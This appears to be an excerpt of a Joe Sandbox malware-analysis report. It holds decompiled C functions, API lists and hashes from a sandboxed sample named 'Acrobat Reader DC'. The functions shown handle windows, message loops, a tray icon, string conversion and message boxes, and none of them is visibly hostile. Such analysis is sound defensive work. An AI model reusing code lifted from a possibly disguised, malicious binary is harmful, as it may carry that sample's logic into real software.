                                  									_t45 =  *0x4a86a4; // 0xa51ad0
                                  									_t46 =  *(_t45 + _t76 * 4);
                                  									if( *_t46 == 0) {
                                  										goto L16;
                                  									}
                                  									L6:
                                  									_t47 =  *_t46;
                                  									if(_t47[1] !=  *((intOrPtr*)(_t68 + 4)) || (_t47[0x22] & 0x00000020) != 0) {
                                  										goto L16;
                                  									} else {
                                  										_t60 = _t47[0x22];
                                  										if(_t60 == 0xff || (_t60 & 0x000000ff) ==  *((intOrPtr*)(_t68 + 0x194))) {
                                  											GetWindowRect( *_t47,  &_v36);
                                  											_push(_a12);
                                  											if(PtInRect( &_v36, _a8) == 0) {
                                  												goto L16;
                                  											} else {
                                  												_t52 = _a4;
                                  												if( *_t52 != _t80) {
                                  													_v16 = _t80;
                                  												}
                                  												_t62 =  *0x4a86a4; // 0xa51ad0
                                  												if(( *( *((intOrPtr*)( *((intOrPtr*)(_t62 + _t76 * 4)))) + 0x8a) & 0x00000008) != 0) {
                                  													if( *_t52 != _t80) {
                                  														 *_t52 = _v16;
                                  													}
                                  													return _t76;
                                  												} else {
                                  													if(_v12 < 0) {
                                  														_v12 = _t76;
                                  													}
                                  													goto L16;
                                  												}
                                  											}
                                  										} else {
                                  											goto L16;
                                  										}
                                  									}
                                  									goto L26;
                                  									L16:
                                  									_t76 = _t76 + 1;
                                  									_t96 = _t76 -  *0x4a86b4; // 0x2
                                  									if(_t96 <= 0) {
                                  										_t68 = _v20;
                                  										_t45 =  *0x4a86a4; // 0xa51ad0
                                  										_t46 =  *(_t45 + _t76 * 4);
                                  										if( *_t46 == 0) {
                                  											goto L16;
                                  										}
                                  									} else {
                                  										goto L17;
                                  									}
                                  									goto L26;
                                  								}
                                  							}
                                  						}
                                  						goto L26;
                                  						L17:
                                  						_t80 = _t80 + 1;
                                  					} while (_t80 < _t54);
                                  					_t44 = _v12;
                                  					if(_t44 < 0) {
                                  						goto L24;
                                  					} else {
                                  						_t58 = _v16;
                                  						if(_t58 < 0) {
                                  							L25:
                                  							return _t44;
                                  						} else {
                                  							 *_a4 = _t58;
                                  							return _t44;
                                  						}
                                  					}
                                  				}
                                  				L26:
                                  			}

























                                  APIs
                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                  • GetWindowRect.USER32 ref: 00441722
                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Rect$BeepClientMessageScreenWindow
                                  • String ID:
                                  • API String ID: 1352109105-0
                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042083F(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				char _v8;
                                  				signed int _v12;
                                  				char _v20;
                                  				char _t43;
                                  				char _t46;
                                  				signed int _t53;
                                  				signed int _t54;
                                  				intOrPtr _t56;
                                  				intOrPtr _t57;
                                  				int _t58;
                                  				char _t59;
                                  				short* _t60;
                                  				int _t65;
                                  				char* _t73;
                                  
                                  				_t73 = _a8;
                                  				if(_t73 == 0 || _a12 == 0) {
                                  					L5:
                                  					return 0;
                                  				} else {
                                  					if( *_t73 != 0) {
                                  						E00411321( &_v20, __edi, _a16);
                                  						_t43 = _v20;
                                  						__eflags =  *(_t43 + 0x14);
                                  						if( *(_t43 + 0x14) != 0) {
                                  							_t46 = E004131B1( *_t73 & 0x000000ff,  &_v20);
                                  							__eflags = _t46;
                                  							if(_t46 == 0) {
                                  								__eflags = _a4;
                                  								_t40 = _v20 + 4; // 0xbbdae900
                                  								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                  								if(__eflags != 0) {
                                  									L10:
                                  									__eflags = _v8;
                                  									if(_v8 != 0) {
                                  										_t53 = _v12;
                                  										_t11 = _t53 + 0x70;
                                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                  										__eflags =  *_t11;
                                  									}
                                  									return 1;
                                  								}
                                  								L21:
                                  								_t54 = E00417F77(__eflags);
                                  								 *_t54 = 0x2a;
                                  								__eflags = _v8;
                                  								if(_v8 != 0) {
                                  									_t54 = _v12;
                                  									_t33 = _t54 + 0x70;
                                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                  									__eflags =  *_t33;
                                  								}
                                  								return _t54 | 0xffffffff;
                                  							}
                                  							_t56 = _v20;
                                  							_t15 = _t56 + 0xac; // 0x1ac
                                  							_t65 =  *_t15;
                                  							__eflags = _t65 - 1;
                                  							if(_t65 <= 1) {
                                  								L17:
                                  								_t24 = _t56 + 0xac; // 0x1ac
                                  								__eflags = _a12 -  *_t24;
                                  								if(__eflags < 0) {
                                  									goto L21;
                                  								}
                                  								__eflags = _t73[1];
                                  								if(__eflags == 0) {
                                  									goto L21;
                                  								}
                                  								L19:
                                  								_t26 = _t56 + 0xac; // 0x1ac
                                  								_t57 =  *_t26;
                                  								__eflags = _v8;
                                  								if(_v8 == 0) {
                                  									return _t57;
                                  								}
                                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                  								return _t57;
                                  							}
                                  							__eflags = _a12 - _t65;
                                  							if(_a12 < _t65) {
                                  								goto L17;
                                  							}
                                  							__eflags = _a4;
                                  							_t21 = _t56 + 4; // 0xbbdae900
                                  							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                  							__eflags = _t58;
                                  							_t56 = _v20;
                                  							if(_t58 != 0) {
                                  								goto L19;
                                  							}
                                  							goto L17;
                                  						}
                                  						_t59 = _a4;
                                  						__eflags = _t59;
                                  						if(_t59 != 0) {
                                  							 *_t59 =  *_t73 & 0x000000ff;
                                  						}
                                  						goto L10;
                                  					} else {
                                  						_t60 = _a4;
                                  						if(_t60 != 0) {
                                  							 *_t60 = 0;
                                  						}
                                  						goto L5;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                  • __isleadbyte_l.LIBCMT ref: 004208A6
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                  • String ID:
                                  • API String ID: 3058430110-0
                                  • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                  • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E00442A83(intOrPtr _a4) {
                                  				struct tagMSG _v32;
                                  				void* __ebx;
                                  				int _t28;
                                  				intOrPtr _t41;
                                  
                                  				_t41 = _a4;
                                  				if( *0x4974e3 != 0 ||  *0x4a8668 != 0 &&  *(_t41 + 0xf8) == 0) {
                                  					return 0;
                                  				} else {
                                  					_t28 = 1;
                                  					if(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
                                  						while(_v32.message != 0x12) {
                                  							if(E0040D150(0x4a8630,  &_v32) == 0) {
                                  								if(E0040D170(0x4a8630,  &_v32) == 0) {
                                  									TranslateMessage( &_v32);
                                  									DispatchMessageW( &_v32);
                                  								}
                                  								_t28 = 1;
                                  							}
                                  							if(PeekMessageW( &_v32, 0, 0, 0, _t28) != 0) {
                                  								continue;
                                  							} else {
                                  							}
                                  							goto L14;
                                  						}
                                  						 *(_t41 + 0xfc) = _t28;
                                  						 *(_t41 + 0xf8) = _t28;
                                  					}
                                  					L14:
                                  					if( *0x4974e6 == _t28) {
                                  						 *0x4974ec = 0;
                                  						 *0x4974e6 = 0;
                                  						 *(_t41 + 0xf8) = _t28;
                                  					}
                                  					if( *(_t41 + 0xf8) != _t28) {
                                  						asm("sbb eax, eax");
                                  						return  ~( *0x4974ec & 0x000000ff) & 0x0000000b;
                                  					} else {
                                  						return _t28;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchTranslate
                                  • String ID:
                                  • API String ID: 1795658109-0
                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040E0C0(intOrPtr __esi, void* __fp0) {
                                  				struct _NOTIFYICONDATAW _v940;
                                  				struct HICON__* _t31;
                                  				long _t33;
                                  				long _t34;
                                  				intOrPtr _t41;
                                  				intOrPtr _t47;
                                  				intOrPtr _t48;
                                  				long _t51;
                                  				intOrPtr _t53;
                                  				void* _t64;
                                  
                                  				_t64 = __fp0;
                                  				_t53 = __esi;
                                  				_v940.cbSize = 0x3a8;
                                  				E00412F40( &(_v940.hWnd), 0, 0x3a4);
                                  				if( *((intOrPtr*)(__esi + 0x198)) == 0) {
                                  					_t48 =  *0x4a7f44; // 0xc006f
                                  					 *((intOrPtr*)(__esi + 0x198)) = _t48;
                                  				}
                                  				if( *((intOrPtr*)(_t53 + 0x1a4)) == 0) {
                                  					_t41 =  *0x4a7f48; // 0x502b1
                                  					 *((intOrPtr*)(_t53 + 0x1a4)) = _t41;
                                  					 *((intOrPtr*)(_t53 + 0x1a8)) = _t41;
                                  				}
                                  				if( *((intOrPtr*)(_t53 + 0x1b0)) == 0) {
                                  					_t47 =  *0x4a7f4c; // 0x150137
                                  					 *((intOrPtr*)(_t53 + 0x1b0)) = _t47;
                                  				}
                                  				_t10 = _t53 + 0x19c; // 0x0
                                  				_t31 =  *_t10;
                                  				_t11 = _t53 + 0x1a0; // 0x4a88b0
                                  				_t51 = _t11;
                                  				if(_t31 != 0) {
                                  					if( *_t51 != 0) {
                                  						DestroyIcon(_t31);
                                  					}
                                  				}
                                  				 *(_t53 + 0x19c) = 0;
                                  				 *_t51 = 0;
                                  				_v940.hWnd =  *0x497518;
                                  				_v940.uID = 1;
                                  				_v940.uFlags = 3;
                                  				_v940.uCallbackMessage = 0x401;
                                  				_v940.hIcon = 0;
                                  				if( *((intOrPtr*)(_t53 + 0x40)) != 0) {
                                  					_t23 = _t53 + 0x3c; // 0xa51a40
                                  					_t24 = _t53 + 0x10; // 0xffffffff
                                  					_t33 = E004341E6(_t53,  *_t24,  *_t23, _t51);
                                  					_v940.hWnd = _t33;
                                  					 *(_t53 + 0x19c) = _t33;
                                  					if( *((intOrPtr*)(_t53 + 0x40)) == 0) {
                                  						goto L8;
                                  					}
                                  					if(_t33 != 0) {
                                  						goto L9;
                                  					}
                                  					goto L8;
                                  				} else {
                                  					L8:
                                  					_t19 = _t53 + 0x198; // 0x0
                                  					_t34 =  *_t19;
                                  					_v940.hIcon = _t34;
                                  					 *(_t53 + 0x19c) = _t34;
                                  					L9:
                                  					if( *0x4974ea == 1) {
                                  						Shell_NotifyIconW(1,  &_v940);
                                  					} else {
                                  						Shell_NotifyIconW(0,  &_v940);
                                  						 *0x4974ea = 1;
                                  					}
                                  					return E00401B80(_t53, _t64);
                                  				}
                                  			}

                                  APIs
                                  • _memset.LIBCMT ref: 0040E0E2
                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell__memset
                                  • String ID:
                                  • API String ID: 928536360-0
                                  • Opcode ID: 245d695d0f2af4038a59a525fce9533f4fc2119324cc59ce2a552f74bd7fa797
                                  • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                  • Opcode Fuzzy Hash: 245d695d0f2af4038a59a525fce9533f4fc2119324cc59ce2a552f74bd7fa797
                                  • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E00434CC9(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr* _a8, short* _a12) {
                                  				void* __edi;
                                  				void* __esi;
                                  				short _t25;
                                  				WCHAR* _t33;
                                  				int _t34;
                                  				WCHAR* _t38;
                                  				signed int _t52;
                                  				signed int _t53;
                                  				void* _t56;
                                  				WCHAR* _t57;
                                  				void* _t65;
                                  
                                  				_t38 = _a4;
                                  				 *_a8 = 4;
                                  				_t25 = E00434C09(__ecx, __eflags, _t38);
                                  				 *_a12 = _t25;
                                  				_t65 = _t25 - 0xffff;
                                  				if(_t65 != 0) {
                                  					return _t25;
                                  				} else {
                                  					_push(_t56);
                                  					_t52 = lstrlenW(_t38);
                                  					_t4 = _t52 + 1; // 0x1
                                  					_push( ~(0 | _t65 > 0x00000000) | _t4 * 0x00000002);
                                  					_t57 = E004115D7(_t52, _t56, _t65);
                                  					lstrcpyW(_t57, _t38);
                                  					_t57[_t52] = 0;
                                  					_t53 = 0;
                                  					if( *_t57 == 0) {
                                  						L9:
                                  						_push(_t57);
                                  						return E004111DC();
                                  					}
                                  					_t33 = _t57;
                                  					while( *_t33 != 0x3a) {
                                  						_t53 = _t53 + 1;
                                  						_t33 =  &(_t57[_t53]);
                                  						if(_t57[_t53] != 0) {
                                  							continue;
                                  						}
                                  						_push(_t57);
                                  						return E004111DC();
                                  						goto L11;
                                  					}
                                  					_t18 = _t53 * 2; // 0x2
                                  					_t45 = _t57 + _t18 + 2;
                                  					_t34 = lstrcmpiW(_t57 + _t18 + 2, L"cdecl");
                                  					__eflags = _t34;
                                  					if(_t34 == 0) {
                                  						 *_a8 = 1;
                                  					}
                                  					__eflags = 0;
                                  					_t57[_t53] = 0;
                                  					 *_a12 = E00434C09(_t45, 0, _t57);
                                  					goto L9;
                                  				}
                                  				L11:
                                  			}















                                  APIs
                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32 ref: 00434C44
                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • lstrcpyW.KERNEL32 ref: 00434D1E
                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: lstrcmpilstrcpylstrlen$_malloc
                                  • String ID: cdecl
                                  • API String ID: 3850814276-3896280584
                                  • Opcode ID: 735b47e65ab2a3ecff459c406ccee83f25449b742c89b67713f935960f6b94f6
                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                  • Opcode Fuzzy Hash: 735b47e65ab2a3ecff459c406ccee83f25449b742c89b67713f935960f6b94f6
                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004368A0(void* _a4, intOrPtr* _a8) {
                                  				int _v8;
                                  				void* _v12;
                                  				int _t16;
                                  				long _t29;
                                  				struct HWND__** _t38;
                                  
                                  				_t38 = _a4;
                                  				SendMessageW( *_t38, 0xb0,  &_a4,  &_v12);
                                  				_t16 = _a4;
                                  				_v8 = _t16;
                                  				_t29 = SendMessageW( *_t38, 0xc9, _t16, 0);
                                  				if(_t29 < 1) {
                                  					 *_a8 = _a4 + 1;
                                  					return 1;
                                  				} else {
                                  					if(_t29 == SendMessageW( *_t38, 0xc9, _a4, 0)) {
                                  						do {
                                  							_a4 = _a4 - 1;
                                  						} while (_t29 == SendMessageW( *_t38, 0xc9, _a4 - 1, 0));
                                  					}
                                  					 *_a8 = _v8 - _a4;
                                  					return 1;
                                  				}
                                  			}









                                  APIs
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                  • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004301F8(struct HWND__** _a4, long _a8, WCHAR* _a12, WCHAR* _a16, signed int _a20, int _a24, int _a28, int _a32, int _a36, struct HMENU__* _a40, char _a44) {
                                  				long _t16;
                                  				long _t23;
                                  				struct HINSTANCE__* _t25;
                                  				struct HWND__** _t33;
                                  				struct HWND__* _t34;
                                  
                                  				_t16 = _a8;
                                  				_t23 = _a20 | 0x50000000;
                                  				_t33 = _a4;
                                  				if((_t16 & 0x00080000) != 0) {
                                  					_t16 = _t16 & 0xfff7ffff;
                                  				}
                                  				_t25 =  *0x4a8684; // 0x400000
                                  				_t34 = CreateWindowExW(_t16, _a12, _a16, _t23, _a24, _a28, _a32, _a36,  *_t33, _a40, _t25, 0);
                                  				if(_t34 != 0) {
                                  					if(_a44 != 0) {
                                  						SendMessageW(_t34, 0x30, GetStockObject(0x11), 0);
                                  					}
                                  					if(_t33[0x64] >= 0 && _t33[0x67] != 0) {
                                  						ShowWindow(_t34, 0);
                                  					}
                                  				}
                                  				return _t34;
                                  			}









                                  APIs
                                  • CreateWindowExW.USER32 ref: 00430242
                                  • GetStockObject.GDI32(00000011), ref: 00430258
                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                  • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$CreateMessageObjectSendShowStock
                                  • String ID:
                                  • API String ID: 1358664141-0
                                  • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                  • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00443C87(struct HWND__* _a4, WCHAR* _a8, WCHAR* _a12, int _a16, char _a20) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				signed int _t11;
                                  				char _t22;
                                  				signed int _t23;
                                  				void* _t24;
                                  
                                  				_t22 = _a20;
                                  				_t24 = 0;
                                  				 *0x4974ee = 0;
                                  				if(_t22 != 0) {
                                  					 *0x4974ef = 1;
                                  					_v12 = GetCurrentThreadId();
                                  					_v8 = _t22;
                                  					_t24 = E00413D7F(0, 0, E00443B61,  &_v12, 0,  &_a20);
                                  				}
                                  				_t11 = MessageBoxW(_a4, _a8, _a12, _a16);
                                  				_t23 = _t11;
                                  				if(_t24 != 0) {
                                  					 *0x4974ef = 0;
                                  					WaitForSingleObject(_t24, 0xffffffff);
                                  					_t11 = CloseHandle(_t24);
                                  				}
                                  				if( *0x4974ee != 1) {
                                  					return _t23;
                                  				} else {
                                  					return _t11 | 0xffffffff;
                                  				}
                                  			}










                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                  • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                  • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 2880819207-0
                                  • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                  • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
